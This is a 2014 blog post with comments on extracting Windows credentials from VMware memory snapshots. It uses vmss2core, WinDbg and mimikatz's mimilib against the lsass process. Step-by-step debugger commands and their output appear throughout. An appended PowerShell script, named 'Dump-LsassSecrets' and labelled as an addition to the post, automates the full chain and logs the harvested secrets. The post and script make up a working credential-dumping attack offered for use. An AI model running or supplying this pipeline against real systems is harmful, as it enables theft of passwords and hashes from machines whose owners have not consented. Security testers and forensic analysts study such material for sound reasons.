Friday, June 13, 2014

Mimikatz Against Virtual Machine Memory Part 2


Short update on performing the actions from Part 1 against Windows 8+ and Windows Server 2012 guests.


First issue was symbols in WinDbg. Most importantly, there were NO symbols loaded for the new dump. This Microsoft article shows how to set a symbol path that downloads them on demand from the public symbol server (f:\localsymbols below is just the local cache directory; use whatever path you like):

http://support.microsoft.com/kb/311503

.sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols


0: kd> .sympath SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols
Expanded Symbol search path is: srv*f:\localsymbols*http://msdl.microsoft.com/download/symbols
0: kd> .reload
Loading Kernel Symbols
...............................................................
................................................................
..............
Loading User Symbols

Loading unloaded module list
.........


Second issue was creating the .dmp file. I tried Volatility's imagecopy and the Windows Memory Toolkit. Neither produced a dump file that WinDbg would open for Windows 8 or Windows Server 2012. What did work was VMware's vmss2core utility.

Note: for VMware Workstation/Fusion you need to pass it both the .vmsn and the .vmem file (shown above).

For VMware ESXi I just needed to pass the .vmsn file.

The rest follows the same flow as the previous post:

1. Load the memory.dmp file vmss2core created

2. Fix your symbols (shown above)

3. Load the mimilib.dll file

kd> .load C:\users\user\desktop\mimilib.dll

4. Find the lsass process

kd> !process 0 0 lsass.exe
PROCESS ffffe00112f08080
    SessionId: 0  Cid: 01e8    Peb: 7ff623aac000  ParentCid: 0194
    DirBase: 06291000  ObjectTable: ffffc001f8f0c400  HandleCount:
    Image: lsass.exe


5. Switch to that process

kd> .process /r /p ffffe00112f08080
Implicit process is now ffffe001`12f08080
Loading User Symbols
................................................................



6. Run Mimikatz

kd> !mimikatz


7. Drink Beers
CG
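
To tie steps 1 through 6 together, here is an added PowerShell script (not from the original post and not part of mimikatz or VMware's tooling) that runs vmss2core and then drives kd.exe non-interactively through the same symbol fix, mimilib load, lsass lookup, context switch and !mimikatz call. The tool paths, the assumption that the .vmsn and .vmem share a base name, and the assumption that the dump contains a single lsass.exe are all mine; the .foreach idiom simply replaces the manual copy of the EPROCESS address from the !process output.

```powershell
# Added example: automate vmss2core -> kd -> mimilib for a Windows 8 / Server 2012
# x64 guest. All paths are assumptions; point them at your own installs. Needs
# vmss2core.exe (VMware), kd.exe (Debugging Tools for Windows) and the x64 mimilib.dll.
param(
    [Parameter(Mandatory=$true)] [string]$VmDir,                       # folder holding the snapshot files
    [string]$Vmss2Core = 'C:\Tools\vmss2core.exe',                     # assumed path
    [string]$Kd        = 'C:\Program Files (x86)\Windows Kits\8.1\Debuggers\x64\kd.exe',
    [string]$MimiLib   = 'C:\Tools\mimikatz\x64\mimilib.dll',
    [string]$SymPath   = 'SRV*f:\localsymbols*http://msdl.microsoft.com/download/symbols',
    [string]$Log       = 'C:\Tools\mimikatz-kd.log'
)

$ErrorActionPreference = 'Stop'

# Step 1: build the dump. Workstation/Fusion keep guest memory in a separate .vmem
# next to the .vmsn; ESXi puts it inside the .vmsn, so the .vmem argument is optional.
$vmsn = Get-ChildItem -Path $VmDir -Filter *.vmsn | Select-Object -First 1
if (-not $vmsn) { throw "no .vmsn found in $VmDir" }
$vmem = Get-ChildItem -Path $VmDir -Filter *.vmem |
        Where-Object { $_.BaseName -eq $vmsn.BaseName } |   # assumption: same base name
        Select-Object -First 1

$coreArgs = @('-W8', $vmsn.FullName)      # -W8: vmss2core's Windows 8 / Server 2012 dump format
if ($vmem) { $coreArgs += $vmem.FullName }

Push-Location $VmDir                      # vmss2core writes memory.dmp into the current directory
try {
    & $Vmss2Core @coreArgs
    if ($LASTEXITCODE -ne 0) { throw "vmss2core failed with exit code $LASTEXITCODE" }
} finally {
    Pop-Location
}
$dump = Join-Path $VmDir 'memory.dmp'
if (-not (Test-Path $dump)) { throw "vmss2core did not produce $dump" }

# Steps 2-6: -y sets the symbol path (step 2), then the -c command string reloads
# symbols, loads mimilib (step 3) and, for the lsass.exe EPROCESS found by !process
# (step 4), switches context (step 5) and runs !mimikatz (step 6).
# .foreach /pS 1 skips the leading "PROCESS" token so 'proc' becomes the address;
# /ps 100 skips the rest of that block (about 16 tokens) before the next PROCESS line,
# which assumes the dump holds a single lsass.exe, as in the post's output.
$cmds = @(
    '.reload',
    ".load $MimiLib",
    '.foreach /pS 1 /ps 100 (proc {!process 0 0 lsass.exe}) { .process /r /p proc; !mimikatz }',
    'q'
) -join '; '

& $Kd -z $dump -y $SymPath -logo $Log -c $cmds
Write-Host "kd output (including !mimikatz results) written to $Log"
```

Run it as `.\Dump-LsassSecrets.ps1 -VmDir 'D:\VMs\Win2012'` (script name is mine). Everything kd prints, including the !mimikatz output, lands in the -logo file, so there is nothing to copy out of the console; the .foreach step is the only part that differs from typing the post's commands by hand.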

4 comments:

CG said...

from Benjamin
http://blog.gentilkiwi.com/retro-ingenierie/symboles-microsoft-windbg-ida-process-explorer-monitor

Anonymous said...

Very practical research! Can you apply your approach to an Inception FireWire raw memory dump file, in your opinion? I have a 4GB memdump file acquired via FireWire from a customer laptop, but get the following error message if I try to bin2dmp it:
"Initializing memory descriptors... Done.
Looking for kernel variables... Failed.
Cannot open file. Please check if the file is not being used."

Thanks in advance, and thanks for all your great input over the last couple of years!

CG said...

@anonymous I don't know on that one. Sorry.

lcantoni said...

You may find it useful to know that there is also a custom Volatility plugin that promises to dump the passwords directly from the RAM dump, without the need to open the image with WinDbg:

http://blog.digital-forensics.it/2014/03/et-voila-le-mimikatz-offline.html

https://code.google.com/p/hotoloti/

I didn't test it, but from the source it appears to support Windows 7 and Vista only, both 32- and 64-bit.